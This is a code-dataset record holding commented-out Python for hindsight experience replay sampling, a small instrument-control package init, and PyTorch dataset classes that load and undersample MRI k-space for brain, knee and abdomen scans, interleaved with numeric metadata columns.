# # print("policy_index", policy_index)
# # print("ep_Ts:", ep_Ts)
# # print("num_cand_trans:", num_candidate_transitions)
# # print(rollout_batch_size)
# # print(batch_size)
# # print("probas:", probas)
# # print("ep_idxs:", episode_idxs)
# # print("t_per_ep:", t_per_ep)
# # TAKE t_per_ep SAMPLE FROM EVERY EP AND LINE UP WITH episode_idxs THEN SHUFFLE TOGETHER FOR USE IN CREATING TRANSITIONS
# t_samples = []
# her_indexes = []
# future_t = []
# future_ag = []
# #TODO: currently using "future" strategy, test against subgoal-based. Also see if explicitly enforcing "final" changes much
# for i in range(rollout_batch_size):
# #calculate relevant info for corresponding episode
# np.random.seed(0)
# t_samps = np.random.randint(ep_Ts[i],size=t_per_ep[i])
# np.random.seed(0)
# her_inds = np.where(np.random.uniform(size=t_per_ep[i]) < future_p)[0]
# np.random.seed(0)
# future_offset = np.random.uniform(size=t_per_ep[i]) * (ep_Ts[i] - t_samps)
# future_offset = future_offset.astype(int)
# her_ind = her_inds.astype(int)
# fut_t = (t_samps + 1 + future_offset)[her_inds]
# fut_ag = episode_batch['ag'][episode_idxs[her_inds], fut_t]
# #TODO: does it matter if this is shuffled or not?
# #shuffle all info together
# # inds = np.arange(t_per_ep[i])
# # np.random.shuffle(inds)
# # t_samps = t_samps[inds]
# # # her_inds = her_inds[inds[her_inds]]
# # fut_t = fut_t[inds[her_inds]]
# # fut_ag = fut_ag[inds[her_inds]]
# #concat to output
# if i == 0:
# t_samples = t_samps.copy()
# her_indexes = her_inds.copy()
# future_t = fut_t.copy()
# future_ag = fut_ag.copy()
# else:
# t_samples = np.concatenate((t_samples,t_samps))
# her_indexes = np.concatenate((her_indexes, her_inds))
# future_t = np.concatenate((future_t, fut_t))
# future_ag = np.concatenate((future_ag,fut_ag))
# transitions = {key: episode_batch[key][episode_idxs, t_samples].copy()
# for key in episode_batch.keys()}
# transitions['g'][her_indexes] = future_ag
# # Reconstruct info dictionary for reward computation.
# info = {}
# for key, value in transitions.items():
# if key.startswith('info_'):
# info[key.replace('info_', '')] = value
# # Re-compute reward since we may have substituted the goal.
# reward_params = {k: transitions[k] for k in ['ag_2', 'g']}
# reward_params['info'] = info
# transitions['r'] = reward_fun(**reward_params)
# transitions = {k: transitions[k].reshape(batch_size, *transitions[k].shape[1:])
# for k in transitions.keys()}
# assert(transitions['u'].shape[0] == batch_size_in_transitions)
# return transitions
# import pickle
# def make_sample_her_transitions(replay_strategy, replay_k, reward_fun, policy_index):
# """Creates a sample function that can be used for HER experience replay.
# Args:
# replay_strategy (in ['future', 'none']): the HER replay strategy; if set to 'none',
# regular DDPG experience replay is used
# replay_k (int): the ratio between HER replays and regular replays (e.g. k = 4 -> 4 times
# as many HER replays as regular replays are used)
# reward_fun (function): function to re-compute the reward with substituted goals
# """
# if replay_strategy == 'future':
# future_p = 1 - (1. / (1 + replay_k))
# else: # 'replay_strategy' == 'none'
# future_p = 0
# def _sample_her_transitions(episode_batch, batch_size_in_transitions):
# transitions1 = _sample_her_transitions_orig(episode_batch, batch_size_in_transitions, future_p, replay_k, reward_fun, policy_index)
# transitions2 = _sample_her_transitions_subgoal(episode_batch, batch_size_in_transitions, future_p, replay_k, reward_fun, policy_index)
# for thing1, thing2 in zip(transitions1.values(),transitions2.values()):
# # print(thing1==thing2)
# same = True
# for t1,t2 in zip(thing1,thing2):
# # print(t1)
# if not (t1==t2).all():
# same = False
# # print(t1,t2)
# if not same:
# pickle.dump(episode_batch, open("example_diff_episode.pkl", "wb"))
# print(10/0)
# print("equal")
# return transitions1
# return _sample_her_transitions
| 45.871795
| 161
| 0.61962
| 3,282
| 25,046
| 4.502438
| 0.085009
| 0.04507
| 0.025986
| 0.034242
| 0.971645
| 0.964539
| 0.956892
| 0.956892
| 0.956892
| 0.956892
| 0
| 0.008086
| 0.264314
| 25,046
| 545
| 162
| 45.955963
| 0.793878
| 0.82596
| 0
| 0.044444
| 0
| 0
| 0.00871
| 0
| 0
| 0
| 0
| 0.00367
| 0.022222
| 1
| 0.044444
| false
| 0
| 0.044444
| 0
| 0.133333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
79af0e8fdecfc8e568a82ab1b06855e242bc6b3a
| 135
|
py
|
Python
|
pyOSA/__init__.py
|
gregmoille/InstrumentControl
|
4cc8477e36f7c4ad4bf4f54036fdd8dd985b4133
|
[
"MIT"
] | 3
|
2018-05-02T20:14:15.000Z
|
2020-10-18T03:57:09.000Z
|
pyOSA/__init__.py
|
gregmoille/InstrumentControl
|
4cc8477e36f7c4ad4bf4f54036fdd8dd985b4133
|
[
"MIT"
] | 1
|
2019-05-23T15:21:08.000Z
|
2019-05-23T15:21:08.000Z
|
pyOSA/__init__.py
|
gregmoille/InstrumentControl
|
4cc8477e36f7c4ad4bf4f54036fdd8dd985b4133
|
[
"MIT"
] | 2
|
2019-05-16T20:36:25.000Z
|
2020-09-22T18:26:49.000Z
|
from .yokogawa import Yokogawa
# from .yokogawa import Yokogawa
from ._ui_OSAjupyter import uiOSA
from ._OSA_Jupyter import OSAjupyter
| 27
| 36
| 0.837037
| 18
| 135
| 6.055556
| 0.444444
| 0.220183
| 0.330275
| 0.477064
| 0.513761
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.125926
| 135
| 4
| 37
| 33.75
| 0.923729
| 0.222222
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
30e3518d8bdb2f1459aa3df9dd7436b0eee48297
| 29,516
|
py
|
Python
|
dataloaders.py
|
utcsilab/csgm-mri-langevin
|
91e0a5ac658feaf6460045706ef16dd140894374
|
[
"MIT"
] | 32
|
2021-08-08T00:45:03.000Z
|
2022-03-16T08:26:42.000Z
|
dataloaders.py
|
d-dimos/csgm-mri-langevin
|
91e0a5ac658feaf6460045706ef16dd140894374
|
[
"MIT"
] | 2
|
2021-11-18T17:59:48.000Z
|
2022-03-05T14:49:49.000Z
|
dataloaders.py
|
d-dimos/csgm-mri-langevin
|
91e0a5ac658feaf6460045706ef16dd140894374
|
[
"MIT"
] | 4
|
2021-09-24T00:02:42.000Z
|
2022-03-25T00:07:36.000Z
|
from scipy.ndimage.interpolation import rotate,zoom
from torch.utils.data import Dataset, DataLoader
import glob
import os
import numpy as np
import torch
from tqdm import tqdm
import h5py
import sigpy as sp
from utils import get_mvue
import pickle as pkl
from xml.etree import ElementTree as ET
import sys
class MVU_Estimator_Brain(Dataset):
def __init__(self, file_list, maps_dir, input_dir,
project_dir='./',
R=1,
image_size=(384,384),
acs_size=26,
pattern='random',
orientation='vertical'):
# Attributes
self.project_dir = project_dir
self.file_list = file_list
self.maps_dir = maps_dir
self.input_dir = input_dir
self.image_size = image_size
self.R = R
self.pattern = pattern
self.orientation = orientation
# Access meta-data of each scan to get number of slices
self.num_slices = np.zeros((len(self.file_list,)), dtype=int)
for idx, file in enumerate(self.file_list):
input_file = os.path.join(self.input_dir, os.path.basename(file))
with h5py.File(os.path.join(self.project_dir, input_file), 'r') as data:
self.num_slices[idx] = int(np.array(data['kspace']).shape[0])
# Create cumulative index for mapping
self.slice_mapper = np.cumsum(self.num_slices) - 1 # Counts from '0'
def __len__(self):
return int(np.sum(self.num_slices)) # Total number of slices from all scans
# Phase encode random mask generator
def _get_mask(self, acs_lines=30, total_lines=384, R=1, pattern='random'):
# Overall sampling budget
num_sampled_lines = np.floor(total_lines / R)
# Get locations of ACS lines
# !!! Assumes k-space is even sized and centered, true for fastMRI
center_line_idx = np.arange((total_lines - acs_lines) // 2,
(total_lines + acs_lines) // 2)
# Find remaining candidates
outer_line_idx = np.setdiff1d(np.arange(total_lines), center_line_idx)
if pattern == 'random':
# Sample remaining lines from outside the ACS at random
random_line_idx = np.random.choice(outer_line_idx,
size=int(num_sampled_lines - acs_lines), replace=False)
elif pattern == 'equispaced':
# Sample equispaced lines
# !!! Only supports integer for now
random_line_idx = outer_line_idx[::int(R)]
else:
raise NotImplementedError('Mask pattern not implemented')
# Create a mask and place ones at the right locations
mask = np.zeros((total_lines))
mask[center_line_idx] = 1.
mask[random_line_idx] = 1.
return mask
# Cropping utility - works with numpy / tensors
def _crop(self, x, wout, hout):
w, h = x.shape[-2:]
x1 = int(np.ceil((w - wout) / 2.))
y1 = int(np.ceil((h - hout) / 2.))
return x[..., x1:x1+wout, y1:y1+hout]
def __getitem__(self, idx):
# Convert to numerical
if torch.is_tensor(idx):
idx = idx.tolist()
# Get scan and slice index
# First scan for which index is in the valid cumulative range
scan_idx = int(np.where((self.slice_mapper - idx) >= 0)[0][0])
# Offset from cumulative range
slice_idx = int(idx) if scan_idx == 0 else \
int(idx - self.slice_mapper[scan_idx] + self.num_slices[scan_idx] - 1)
# Load maps for specific scan and slice
maps_file = os.path.join(self.maps_dir,
os.path.basename(self.file_list[scan_idx]))
with h5py.File(os.path.join(self.project_dir, maps_file), 'r') as data:
# Get maps
maps = np.asarray(data['s_maps'][slice_idx])
# Load raw data for specific scan and slice
raw_file = os.path.join(self.input_dir,
os.path.basename(self.file_list[scan_idx]))
with h5py.File(os.path.join(self.project_dir, raw_file), 'r') as data:
# Get maps
gt_ksp = np.asarray(data['kspace'][slice_idx])
# Crop extra lines and reduce FoV in phase-encode
gt_ksp = sp.resize(gt_ksp, (
gt_ksp.shape[0], gt_ksp.shape[1], self.image_size[1]))
# Reduce FoV by half in the readout direction
gt_ksp = sp.ifft(gt_ksp, axes=(-2,))
gt_ksp = sp.resize(gt_ksp, (gt_ksp.shape[0], self.image_size[0],
gt_ksp.shape[2]))
gt_ksp = sp.fft(gt_ksp, axes=(-2,)) # Back to k-space
# Crop extra lines and reduce FoV in phase-encode
maps = sp.fft(maps, axes=(-2, -1)) # These are now maps in k-space
maps = sp.resize(maps, (
maps.shape[0], maps.shape[1], self.image_size[1]))
# Reduce FoV by half in the readout direction
maps = sp.ifft(maps, axes=(-2,))
maps = sp.resize(maps, (maps.shape[0], self.image_size[0],
maps.shape[2]))
maps = sp.fft(maps, axes=(-2,)) # Back to k-space
maps = sp.ifft(maps, axes=(-2, -1)) # Finally convert back to image domain
# find mvue image
mvue = get_mvue(gt_ksp.reshape((1,) + gt_ksp.shape), maps.reshape((1,) + maps.shape))
# !!! Removed ACS-based scaling if handled on the outside
scale_factor = 1.
# Scale data
mvue = mvue / scale_factor
gt_ksp = gt_ksp / scale_factor
# Compute ACS size based on R factor and sample size
total_lines = gt_ksp.shape[-1]
if 1 < self.R <= 6:
# Keep 8% of center samples
acs_lines = np.floor(0.08 * total_lines).astype(int)
else:
# Keep 4% of center samples
acs_lines = np.floor(0.04 * total_lines).astype(int)
# Get a mask
mask = self._get_mask(acs_lines, total_lines,
self.R, self.pattern)
# Mask k-space
if self.orientation == 'vertical':
gt_ksp *= mask[None, None, :]
elif self.orientation == 'horizontal':
gt_ksp *= mask[None, :, None]
else:
raise NotImplementedError
## name for mvue file
mvue_file = os.path.join(self.input_dir,
os.path.basename(self.file_list[scan_idx]))
# Output
sample = {
'mvue': mvue,
'maps': maps,
'ground_truth': gt_ksp,
'mask': mask,
'scale_factor': scale_factor,
# Just for feedback
'scan_idx': scan_idx,
'slice_idx': slice_idx,
'mvue_file': mvue_file}
return sample
class MVU_Estimator_Knees(Dataset):
def __init__(self, file_list, maps_dir, input_dir,
project_dir='./',
R=1,
image_size=(320, 320),
acs_size=26,
pattern='random',
orientation='vertical'):
# Attributes
self.project_dir = project_dir
self.file_list = file_list
self.acs_size = acs_size
self.maps_dir = maps_dir
self.input_dir = input_dir
self.R = R
self.image_size = image_size
self.pattern = pattern
self.orientation = orientation
# Access meta-data of each scan to get number of slices
self.num_slices = np.zeros((len(self.file_list,)), dtype=int)
for idx, file in enumerate(self.file_list):
raw_file = os.path.join(self.input_dir, os.path.basename(file))
with h5py.File(os.path.join(self.project_dir, raw_file), 'r') as data:
value = data['ismrmrd_header'][()]
value = ET.fromstring(value)
self.num_slices[idx] = int(value[4][2][3][1].text) + 1
# Create cumulative index for mapping
self.slice_mapper = np.cumsum(self.num_slices) - 1 # Counts from '0'
def __len__(self):
return int(np.sum(self.num_slices)) # Total number of slices from all scans
# Phase encode random mask generator
def _get_mask(self, acs_lines=30, total_lines=384, R=1, pattern='random'):
# Overall sampling budget
num_sampled_lines = np.floor(total_lines / R)
# Get locations of ACS lines
# !!! Assumes k-space is even sized and centered, true for fastMRI
center_line_idx = np.arange((total_lines - acs_lines) // 2,
(total_lines + acs_lines) // 2)
# Find remaining candidates
outer_line_idx = np.setdiff1d(np.arange(total_lines), center_line_idx)
if pattern == 'random':
# Sample remaining lines from outside the ACS at random
random_line_idx = np.random.choice(outer_line_idx,
size=int(num_sampled_lines - acs_lines), replace=False)
elif pattern == 'equispaced':
# Sample equispaced lines
# !!! Only supports integer for now
random_line_idx = outer_line_idx[::int(R)]
else:
raise NotImplementedError('Mask Pattern not implemented yet...')
# Create a mask and place ones at the right locations
mask = np.zeros((total_lines))
mask[center_line_idx] = 1.
mask[random_line_idx] = 1.
return mask
def _knees_remove_zeros(self, kimage):
# Compute sum-energy of lines
# !!! This is because some lines are near-empty
line_energy = np.sum(np.square(np.abs(kimage)),
axis=(0, 1))
dead_lines = np.where(line_energy < 1e-12)[0] # Sufficient for FP32
# Always remove an even number of lines
dead_lines_front = np.sum(dead_lines < 160)
dead_lines_back = np.sum(dead_lines > 160)
if np.mod(dead_lines_front, 2):
dead_lines = np.delete(dead_lines, 0)
if np.mod(dead_lines_back, 2):
dead_lines = np.delete(dead_lines, -1)
# Remove dead lines completely
k_image = np.delete(kimage, dead_lines, axis=-1)
return k_image
# Cropping utility - works with numpy / tensors
def _crop(self, x, wout, hout):
w, h = x.shape[-2:]
x1 = int(np.ceil((w - wout) / 2.))
y1 = int(np.ceil((h - hout) / 2.))
return x[..., x1:x1+wout, y1:y1+hout]
def __getitem__(self, idx):
# Convert to numerical
if torch.is_tensor(idx):
idx = idx.tolist()
# Get scan and slice index
# First scan for which index is in the valid cumulative range
scan_idx = int(np.where((self.slice_mapper - idx) >= 0)[0][0])
# Offset from cumulative range
slice_idx = int(idx) if scan_idx == 0 else \
int(idx - self.slice_mapper[scan_idx] + self.num_slices[scan_idx] - 1)
# Load maps for specific scan and slice
maps_file = os.path.join(self.maps_dir,
os.path.basename(self.file_list[scan_idx]))
with h5py.File(os.path.join(self.project_dir, maps_file), 'r') as data:
# Get maps
maps = np.asarray(data['s_maps'][slice_idx])
# Load raw data for specific scan and slice
raw_file = os.path.join(self.input_dir,
os.path.basename(self.file_list[scan_idx]))
with h5py.File(os.path.join(self.project_dir, raw_file), 'r') as data:
# Get maps
gt_ksp = np.asarray(data['kspace'][slice_idx])
gt_ksp = self._knees_remove_zeros(gt_ksp)
# Crop extra lines and reduce FoV by half in readout
gt_ksp = sp.resize(gt_ksp, (
gt_ksp.shape[0], gt_ksp.shape[1], self.image_size[1]))
# Reduce FoV by half in the readout direction
gt_ksp = sp.ifft(gt_ksp, axes=(-2,))
gt_ksp = sp.resize(gt_ksp, (gt_ksp.shape[0], self.image_size[0],
gt_ksp.shape[2]))
gt_ksp = sp.fft(gt_ksp, axes=(-2,)) # Back to k-space
# Crop extra lines and reduce FoV by half in readout
maps = sp.fft(maps, axes=(-2, -1)) # These are now maps in k-space
maps = sp.resize(maps, (
maps.shape[0], maps.shape[1], self.image_size[1]))
# Reduce FoV by half in the readout direction
maps = sp.ifft(maps, axes=(-2,))
maps = sp.resize(maps, (maps.shape[0], self.image_size[0],
maps.shape[2]))
maps = sp.fft(maps, axes=(-2,)) # Back to k-space
maps = sp.ifft(maps, axes=(-2, -1)) # Finally convert back to image domain
# find mvue image
mvue = get_mvue(gt_ksp.reshape((1,) + gt_ksp.shape), maps.reshape((1,) + maps.shape))
# # Load MVUE slice from specific scan
mvue_file = os.path.join(self.input_dir,
os.path.basename(self.file_list[scan_idx]))
# !!! Removed ACS-based scaling if handled on the outside
scale_factor = 1.
# Scale data
mvue = mvue / scale_factor
gt_ksp = gt_ksp / scale_factor
# Compute ACS size based on R factor and sample size
total_lines = gt_ksp.shape[-1]
if 1 < self.R <= 6:
# Keep 8% of center samples
acs_lines = np.floor(0.08 * total_lines).astype(int)
else:
# Keep 4% of center samples
acs_lines = np.floor(0.04 * total_lines).astype(int)
# Get a mask
mask = self._get_mask(acs_lines, total_lines,
self.R, self.pattern)
# Mask k-space
if self.orientation == 'vertical':
gt_ksp *= mask[None, None, :]
elif self.orientation == 'horizontal':
gt_ksp *= mask[None, :, None]
else:
raise NotImplementedError
# Output
sample = {
'mvue': mvue,
'maps': maps,
'ground_truth': gt_ksp,
'mask': mask,
'scale_factor': scale_factor,
# Just for feedback
'scan_idx': scan_idx,
'slice_idx': slice_idx,
'mvue_file': mvue_file}
return sample
class MVU_Estimator_Stanford_Knees(Dataset):
def __init__(self, file_list, maps_dir, input_dir,
project_dir='./',
R=1,
image_size=(320,320),
acs_size=26,
pattern='random',
orientation='vertical'):
# Attributes
self.project_dir = project_dir
self.acs_size = acs_size
self.maps_dir = maps_dir
self.input_dir = input_dir
self.R = R
self.image_size = image_size
self.pattern = pattern
self.orientation = orientation
self.file_list = sorted(file_list)
if len(self.file_list) == 0:
raise IOError('No image files found in the specified path')
# Access meta-data of each scan to get number of slices
# self.maps_file = os.path.join(maps_dir, 'Stanford-Knee-Axial-Selected.h5')
# self.raw_file = os.path.join(input_dir, 'Stanford-Knee-Axial-Selected.h5')
# with h5py.File(os.path.join(self.project_dir, self.raw_file), 'r') as data:
# self.num_slices = np.array(data['kspace']).shape[0]
@property
def num_slices(self):
num_slices = np.zeros((len(self.file_list,)), dtype=int)
for idx, file in enumerate(self.file_list):
with h5py.File(os.path.join(self.project_dir, file), 'r') as data:
num_slices[idx] = np.array(data['kspace']).shape[0]
return num_slices
@property
def slice_mapper(self):
return np.cumsum(self.num_slices) - 1 # Counts from '0'
def __len__(self):
return int(np.sum(self.num_slices)) # Total number of slices from all scans
def __getitem__(self, idx):
# Convert to numerical
if torch.is_tensor(idx):
idx = idx.tolist()
# Get scan and slice index
# First scan for which index is in the valid cumulative range
scan_idx = int(np.where((self.slice_mapper - idx) >= 0)[0][0])
# Offset from cumulative range
slice_idx = int(idx) if scan_idx == 0 else \
int(idx - self.slice_mapper[scan_idx] + self.num_slices[scan_idx] - 1)
# Load specific slice from specific scan
with h5py.File(os.path.join(self.project_dir, self.file_list[scan_idx]), 'r') as data:
# Get maps, kspace, masks
gt_ksp = np.asarray(data['kspace'])[slice_idx]
maps = np.asarray(data['s_maps'])[slice_idx]
mask = np.asarray(data['masks'])[slice_idx]
# find mvue image
mvue = get_mvue(gt_ksp.reshape((1,) + gt_ksp.shape), maps.reshape((1,) + maps.shape))
# # Load MVUE slice from specific scan
mvue_file = os.path.join(self.input_dir,
os.path.basename(self.file_list[scan_idx]))
# !!! Removed ACS-based scaling if handled on the outside
scale_factor = 1.
# Scale data
mvue = mvue / scale_factor
gt_ksp = gt_ksp / scale_factor
# apply mask
gt_ksp *= mask[None, :, :]
# Output
sample = {
'mvue': mvue,
'maps': maps,
'ground_truth': gt_ksp,
'mask': mask,
'scale_factor': scale_factor,
# Just for feedback
'scan_idx': scan_idx,
'slice_idx': slice_idx,
'mvue_file': mvue_file}
return sample
# class MVU_Estimator_Stanford_Knees(Dataset):
# def __init__(self, maps_dir, input_dir,
# project_dir='./',
# R=1,
# image_size=(320,320),
# acs_size=26,
# pattern='random',
# orientation='vertical'):
# # Attributes
# self.project_dir = project_dir
# self.acs_size = acs_size
# self.maps_dir = maps_dir
# self.input_dir = input_dir
# self.R = R
# self.image_size = image_size
# self.pattern = pattern
# self.orientation = orientation
# # Access meta-data of each scan to get number of slices
# self.num_slices = np.ones(18, dtype=int)
# self.maps_file = os.path.join(maps_dir, 'Stanford_maps_rotated.h5')
# self.raw_file = os.path.join(input_dir, 'Stanford_knees.pkl')
# def __len__(self):
# return int(np.sum(self.num_slices)) # Total number of slices from all scans
# # Phase encode random mask generator
# def _get_mask(self, acs_lines=30, total_lines=384, R=1, pattern='random'):
# # Overall sampling budget
# num_sampled_lines = np.floor(total_lines / R)
# # Get locations of ACS lines
# # !!! Assumes k-space is even sized and centered, true for fastMRI
# center_line_idx = np.arange((total_lines - acs_lines) // 2,
# (total_lines + acs_lines) // 2)
# # Find remaining candidates
# outer_line_idx = np.setdiff1d(np.arange(total_lines), center_line_idx)
# if pattern == 'random':
# # Sample remaining lines from outside the ACS at random
# random_line_idx = np.random.choice(outer_line_idx,
# size=int(num_sampled_lines - acs_lines), replace=False)
# elif pattern == 'equispaced':
# # Sample equispaced lines
# # !!! Only supports integer for now
# random_line_idx = outer_line_idx[::int(R)]
# else:
# raise NotImplementedError('Mask Pattern not implemented yet...')
# # Create a mask and place ones at the right locations
# mask = np.zeros((total_lines))
# mask[center_line_idx] = 1.
# mask[random_line_idx] = 1.
# return mask
# # Cropping utility - works with numpy / tensors
# def _crop(self, x, wout, hout):
# w, h = x.shape[-2:]
# x1 = int(np.ceil((w - wout) / 2.))
# y1 = int(np.ceil((h - hout) / 2.))
# return x[..., x1:x1+wout, y1:y1+hout]
# def _rotatecomplex(self, a,angle,reshape=True):
# r = rotate(a.real,angle,reshape=reshape,mode='wrap')
# i = rotate(a.imag,angle,reshape=reshape,mode='wrap')
# return r+1j*i
# def __getitem__(self, idx):
# # Convert to numerical
# if torch.is_tensor(idx):
# idx = idx.tolist()
# # Load maps for specific scan and slice
# with h5py.File(os.path.join(self.project_dir, self.maps_file), 'r') as data:
# # Get maps
# maps = np.asarray(data[f'ge{idx+1}.h5'])
# # Load raw data for specific scan and slice
# with open(os.path.join(self.project_dir, self.raw_file), 'rb') as f:
# # Get maps
# data = pkl.load(f)
# slice_ksp = np.asarray(data[f'ge{idx+1}.h5']['kspace'])
# # rotate kspace by 90 degrees
# gt_ksp = slice_ksp.copy()
# for c,coil in enumerate(slice_ksp):
# gt_ksp[c,:,:] = self._rotatecomplex(coil,90) # the kspace is rotated, so werotate it back to the original format
# # find mvue image
# mvue = get_mvue(gt_ksp.reshape((1,) + gt_ksp.shape), maps.reshape((1,) + maps.shape))
# # # Load MVUE slice from specific scan
# mvue_file = os.path.join(self.input_dir,f'ge{idx+1}.h5')
# # !!! Removed ACS-based scaling if handled on the outside
# scale_factor = 1.
# # Scale data
# mvue = mvue / scale_factor
# gt_ksp = gt_ksp / scale_factor
# # Compute ACS size based on R factor and sample size
# total_lines = gt_ksp.shape[-1]
# if 1 < self.R <= 6:
# # Keep 8% of center samples
# acs_lines = np.floor(0.08 * total_lines).astype(int)
# else:
# # Keep 4% of center samples
# acs_lines = np.floor(0.04 * total_lines).astype(int)
# # Get a mask
# mask = self._get_mask(acs_lines, total_lines,
# self.R, self.pattern)
# # Mask k-space
# if self.orientation == 'vertical':
# gt_ksp *= mask[None, None, :]
# elif self.orientation == 'horizontal':
# gt_ksp *= mask[None, :, None]
# else:
# raise NotImplementedError
# # Output
# sample = {
# 'mvue': mvue,
# 'maps': maps,
# 'ground_truth': gt_ksp,
# 'mask': mask,
# 'scale_factor': scale_factor,
# # Just for feedback
# 'scan_idx': 1,
# 'slice_idx': idx+1,
# 'mvue_file': mvue_file}
# return sample
class MVU_Estimator_Abdomen(Dataset):
def __init__(self, maps_dir, input_dir,
project_dir='./',
R=1,
image_size=(158,320),
acs_size=26,
pattern='random',
rotate=True,
orientation='vertical'):
# Attributes
self.project_dir = project_dir
self.acs_size = acs_size
self.maps_dir = maps_dir
self.input_dir = input_dir
self.R = R
self.image_size = image_size
self.pattern = pattern
self.orientation = orientation
self.rotate = rotate
# Access meta-data of each scan to get number of slices
self.maps_file = os.path.join(self.project_dir, maps_dir, 'data2.h5')
self.raw_file = os.path.join(self.project_dir, input_dir, 'data2.h5')
with h5py.File(self.raw_file, 'r') as f:
self.num_slices = np.array(f['ksp']).shape[0]
def __len__(self):
return self.num_slices # Total number of slices from all scans
# Phase encode random mask generator
def _get_mask(self, acs_lines=30, total_lines=384, R=1, pattern='random'):
# Overall sampling budget
num_sampled_lines = np.floor(total_lines / R)
# Get locations of ACS lines
# !!! Assumes k-space is even sized and centered, true for fastMRI
center_line_idx = np.arange((total_lines - acs_lines) // 2,
(total_lines + acs_lines) // 2)
# Find remaining candidates
outer_line_idx = np.setdiff1d(np.arange(total_lines), center_line_idx)
if pattern == 'random':
# Sample remaining lines from outside the ACS at random
random_line_idx = np.random.choice(outer_line_idx,
size=int(num_sampled_lines - acs_lines), replace=False)
elif pattern == 'equispaced':
# Sample equispaced lines
# !!! Only supports integer for now
random_line_idx = outer_line_idx[::int(R)]
else:
raise NotImplementedError('Mask Pattern not implemented yet...')
# Create a mask and place ones at the right locations
mask = np.zeros((total_lines))
mask[center_line_idx] = 1.
mask[random_line_idx] = 1.
return mask
# Cropping utility - works with numpy / tensors
def _crop(self, x, wout, hout):
w, h = x.shape[-2:]
x1 = int(np.ceil((w - wout) / 2.))
y1 = int(np.ceil((h - hout) / 2.))
return x[..., x1:x1+wout, y1:y1+hout]
def _rotatecomplex(self, a,angle,reshape=True):
r = rotate(a.real,angle,reshape=reshape,mode='wrap')
i = rotate(a.imag,angle,reshape=reshape,mode='wrap')
return r+1j*i
def __getitem__(self, idx):
# Convert to numerical
if torch.is_tensor(idx):
idx = idx.tolist()
# Load maps for specific scan and slice
with h5py.File(os.path.join(self.project_dir, self.maps_file), 'r') as data:
# Get maps
maps = np.asarray(data['maps'])[idx]
# Load raw data for specific scan and slice
with h5py.File(os.path.join(self.project_dir, self.raw_file), 'r') as data:
# Get maps
slice_ksp = np.asarray(data['ksp'])[idx]
# # rotate kspace by 90 degrees
if self.rotate:
gt_ksp = slice_ksp.copy()
for c,coil in enumerate(slice_ksp):
gt_ksp[c,:,:] = self._rotatecomplex(coil,90) # the kspace is rotated, so werotate it back to the original format
else:
gt_ksp = slice_ksp.copy()
# pad readout in image domain
x = sp.ifft(gt_ksp, axes=(-1,))
x = sp.resize(x, (x.shape[0], x.shape[1], self.image_size[1]))
# pad phase-encode in kspace domain
gt_ksp = sp.fft(x, axes=(-1,))
gt_ksp = sp.resize(gt_ksp, (gt_ksp.shape[0], self.image_size[0], self.image_size[1]))
# Crop extra lines and reduce FoV by half in readout
maps = sp.fft(maps, axes=(-1, -2)) # These are now maps in k-space
maps = sp.ifft(maps, axes=(-1,))
maps = sp.resize(maps, (
maps.shape[0], maps.shape[1], self.image_size[1]))
maps = sp.fft(maps, axes=(-1,))
# pad phase-encode in kspace domain
maps = sp.resize(maps, (maps.shape[0], self.image_size[0],
self.image_size[1]))
maps = sp.ifft(maps, axes=(-1, -2)) # Finally convert back to image domain
# find mvue image
mvue = get_mvue(gt_ksp.reshape((1,) + gt_ksp.shape), maps.reshape((1,) + maps.shape))
# # Load MVUE slice from specific scan
mvue_file = os.path.join(self.input_dir,str(idx))
# !!! Removed ACS-based scaling if handled on the outside
scale_factor = 1.
# Scale data
mvue = mvue / scale_factor
gt_ksp = gt_ksp / scale_factor
# Compute ACS size based on R factor and sample size
if self.orientation == 'horizontal':
total_lines = gt_ksp.shape[-2]
elif self.orientation == 'vertical':
total_lines = gt_ksp.shape[-1]
else:
raise NotImplementedError
if 1 < self.R <= 6:
# Keep 8% of center samples
acs_lines = np.floor(0.08 * total_lines).astype(int)
else:
# Keep 4% of center samples
acs_lines = np.floor(0.04 * total_lines).astype(int)
# Get a mask
mask = self._get_mask(acs_lines, total_lines,
self.R, self.pattern)
# Mask k-space
if self.orientation == 'vertical':
gt_ksp *= mask[None, None, :]
elif self.orientation == 'horizontal':
gt_ksp *= mask[None, :, None]
else:
raise NotImplementedError
# Output
sample = {
'mvue': mvue,
'maps': maps,
'ground_truth': gt_ksp,
'mask': mask,
'scale_factor': scale_factor,
# Just for feedback
'scan_idx': 1,
'slice_idx': idx+1,
'mvue_file': mvue_file}
return sample
| 38.734908
| 128
| 0.559527
| 3,869
| 29,516
| 4.095115
| 0.075989
| 0.024615
| 0.018935
| 0.025625
| 0.919149
| 0.899773
| 0.885256
| 0.874085
| 0.864681
| 0.84745
| 0
| 0.017085
| 0.329753
| 29,516
| 761
| 129
| 38.785808
| 0.783804
| 0.330838
| 0
| 0.776382
| 0
| 0
| 0.036089
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.055276
| false
| 0
| 0.032663
| 0.012563
| 0.143216
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
30f4e51e9457320f48033005baae3d7aa65016b1
| 21,442
|
py
|
Python
|
test/transforms.py
|
DefTruth/landmarksaug
|
71d978a062e4a7c8fe90ca62c8dff109ea7718e7
|
[
"MIT"
] | 56
|
2022-02-08T06:45:02.000Z
|
2022-03-27T14:03:08.000Z
|
test/transforms.py
|
DefTruth/pylandmarks
|
71d978a062e4a7c8fe90ca62c8dff109ea7718e7
|
[
"MIT"
] | 9
|
